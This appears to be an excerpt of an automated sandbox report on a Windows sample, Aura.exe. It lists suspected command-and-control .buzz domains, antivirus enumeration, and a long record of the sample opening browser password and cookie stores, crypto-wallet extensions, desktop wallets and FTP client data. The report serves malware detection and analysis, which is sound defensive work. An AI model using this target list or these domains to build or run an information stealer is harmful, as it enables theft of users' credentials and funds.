                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,0_2_000BD1BD
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_000C1287
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,0_2_000C14D8
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_000C1580
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,0_2_000C17D3
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,0_2_000C1840
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,0_2_000C1915
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,0_2_000C1960
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_000C1A07
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,0_2_000C1B0D
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,0_2_000BCC15
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,2_2_000BD1BD
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_000C1287
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,2_2_000C14D8
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_000C1580
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,2_2_000C17D3
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,2_2_000C1840
                Source: C:\Users\user\Desktop\Aura.exeCode function: EnumSystemLocalesW,2_2_000C1915
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,2_2_000C1960
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_000C1A07
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,2_2_000C1B0D
                Source: C:\Users\user\Desktop\Aura.exeCode function: GetLocaleInfoW,2_2_000BCC15
                Source: C:\Users\user\Desktop\Aura.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000B00B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_000B00B4
                Source: C:\Users\user\Desktop\Aura.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Aura.exe, 00000002.00000003.2531148527.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1863828386.0000000003424000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1863893414.000000000342A000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531405737.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511376240.00000000033C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Aura.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Aura.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Aura.exe, 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0
                Source: Aura.exe, 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Elect|b
                Source: Aura.exe, 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Elect|b
                Source: Aura.exe, 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le0
                Source: Aura.exe, 00000002.00000003.1842299699.0000000003417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: Aura.exe, 00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le0
                Source: Aura.exe, 00000002.00000003.1842261348.0000000003424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Aura.exe, 00000002.00000003.1842299699.0000000003417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
